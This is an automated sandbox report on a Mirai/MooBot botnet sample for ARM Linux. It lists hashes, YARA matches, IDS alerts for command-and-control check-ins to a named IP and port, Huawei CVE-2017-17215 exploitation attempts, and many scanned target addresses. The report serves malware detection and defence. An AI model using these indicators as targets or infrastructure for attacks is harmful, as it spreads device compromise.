Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljnee.arm5-20240128-0910.elf

Overview

General Information

Sample name:skyljnee.arm5-20240128-0910.elf
Analysis ID:1382262
MD5:838b1b45aa0abcfc4a836f13bd4e0257
SHA1:95367365edc838facb78f316165b642837c87a8f
SHA256:83a34d93c076cc6293c338007527ed2f583f3f474df5b96d0cd4b6eef212ea3d
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1382262
Start date and time:2024-01-28 10:11:11 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 27s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljnee.arm5-20240128-0910.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@24/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljnee.arm5-20240128-0910.elf
PID:5488
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5503, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5503, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • gdm3 New Fork (PID: 5509, Parent: 1289)
  • Default (PID: 5509, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5525, Parent: 1289)
  • Default (PID: 5525, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5537, Parent: 1)
  • systemd-user-runtime-dir (PID: 5537, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljnee.arm5-20240128-0910.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljnee.arm5-20240128-0910.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljnee.arm5-20240128-0910.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1b7ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b7fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b810:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b824:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b838:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b84c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b860:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b874:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b888:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b89c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b8ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b900:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b914:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b928:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1b93c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5488.1.00007fc254017000.00007fc254036000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5488.1.00007fc254017000.00007fc254036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5488.1.00007fc254017000.00007fc254036000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x1b7ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b7fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b810:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b824:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b838:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b84c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b860:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b874:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b888:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b89c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8d8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b8ec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b900:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b914:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b928:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1b93c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: skyljnee.arm5-20240128-0910.elf PID: 5488JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: skyljnee.arm5-20240128-0910.elf PID: 5488Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x19a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1ae:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1c2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1d6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1ea:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1fe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x212:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x226:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x23a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x24e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x262:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x276:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x28a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x29e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2b2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2c6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2da:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x2ee:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x302:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x316:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x32a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.14103.245.236.14641546199902030490 01/28/24-10:12:02.800320
            SID:2030490
            Source Port:41546
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14640216199902030490 01/28/24-10:13:30.958882
            SID:2030490
            Source Port:40216
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14653724199902030490 01/28/24-10:12:47.902030
            SID:2030490
            Source Port:53724
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14163.191.177.4440282372152835222 01/28/24-10:13:12.735658
            SID:2835222
            Source Port:40282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641830199902030490 01/28/24-10:12:15.325271
            SID:2030490
            Source Port:41830
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14107.178.244.21235510372152829579 01/28/24-10:13:23.913785
            SID:2829579
            Source Port:35510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14203.76.238.1239424372152829579 01/28/24-10:13:04.552269
            SID:2829579
            Source Port:39424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14636976199902030490 01/28/24-10:13:55.219273
            SID:2030490
            Source Port:36976
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641500199902030490 01/28/24-10:11:59.254941
            SID:2030490
            Source Port:41500
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1494.122.213.25339208372152829579 01/28/24-10:13:46.310950
            SID:2829579
            Source Port:39208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14203.76.238.1239424372152835222 01/28/24-10:13:04.552269
            SID:2835222
            Source Port:39424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641700199902030490 01/28/24-10:12:10.566480
            SID:2030490
            Source Port:41700
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14163.191.177.4440282372152829579 01/28/24-10:13:12.735658
            SID:2829579
            Source Port:40282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14643650199902030490 01/28/24-10:14:02.726836
            SID:2030490
            Source Port:43650
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642300199902030490 01/28/24-10:12:26.082884
            SID:2030490
            Source Port:42300
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642374199902030490 01/28/24-10:12:28.848587
            SID:2030490
            Source Port:42374
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641520199902030490 01/28/24-10:13:03.942375
            SID:2030490
            Source Port:41520
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14646618199902030490 01/28/24-10:12:41.369475
            SID:2030490
            Source Port:46618
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14633780199902030490 01/28/24-10:12:56.646277
            SID:2030490
            Source Port:33780
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14655080199902030490 01/28/24-10:13:45.461780
            SID:2030490
            Source Port:55080
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14642580199902030490 01/28/24-10:12:34.615579
            SID:2030490
            Source Port:42580
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14638792199902030490 01/28/24-10:13:01.172532
            SID:2030490
            Source Port:38792
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14659430199902030490 01/28/24-10:13:21.455925
            SID:2030490
            Source Port:59430
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14635758199902030490 01/28/24-10:12:58.403722
            SID:2030490
            Source Port:35758
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14636348199902030490 01/28/24-10:13:27.205716
            SID:2030490
            Source Port:36348
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14651268199902030490 01/28/24-10:13:13.706291
            SID:2030490
            Source Port:51268
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14107.178.244.21235510372152835222 01/28/24-10:13:23.913785
            SID:2835222
            Source Port:35510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14648224199902030490 01/28/24-10:13:37.707601
            SID:2030490
            Source Port:48224
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14639160199902030490 01/28/24-10:13:57.969614
            SID:2030490
            Source Port:39160
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1494.122.213.25339208372152835222 01/28/24-10:13:46.310950
            SID:2835222
            Source Port:39208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14648690199902030490 01/28/24-10:12:44.150265
            SID:2030490
            Source Port:48690
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.14103.245.236.14641516199902030490 01/28/24-10:12:01.025728
            SID:2030490
            Source Port:41516
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: skyljnee.arm5-20240128-0910.elfAvira: detected
            Source: skyljnee.arm5-20240128-0910.elfReversingLabs: Detection: 65%
            Source: skyljnee.arm5-20240128-0910.elfVirustotal: Detection: 58%Perma Link
            Source: skyljnee.arm5-20240128-0910.elfString: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnanolG

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41500 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41516 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41546 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41700 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41830 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42300 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42374 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:42580 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:46618 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:48690 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:53724 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:33780 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:35758 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:38792 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:41520 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39424 -> 203.76.238.12:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39424 -> 203.76.238.12:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40282 -> 163.191.177.44:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40282 -> 163.191.177.44:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:51268 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:59430 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35510 -> 107.178.244.212:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35510 -> 107.178.244.212:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:36348 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:40216 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:48224 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:55080 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39208 -> 94.122.213.253:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39208 -> 94.122.213.253:37215
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:36976 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:39160 -> 103.245.236.146:19990
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:43650 -> 103.245.236.146:19990
            Source: global trafficTCP traffic: 197.131.148.248 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40282 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 35510 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39424 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 39208 -> 37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.84.236.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.107.251.212:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.79.161.215:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.23.101.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 155.76.85.179:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.154.152.150:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.140.177.213:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.6.217.252:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 105.187.211.233:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.54.241.98:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.45.174.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.230.53.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.62.241.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.9.104.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 76.11.199.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 36.17.47.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.89.188.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 197.115.12.45:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 196.104.109.136:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 157.220.149.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.98.34.104:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 41.123.67.59:37215
            Source: global trafficTCP traffic: 192.168.2.14:43670 -> 180.240.229.16:37215
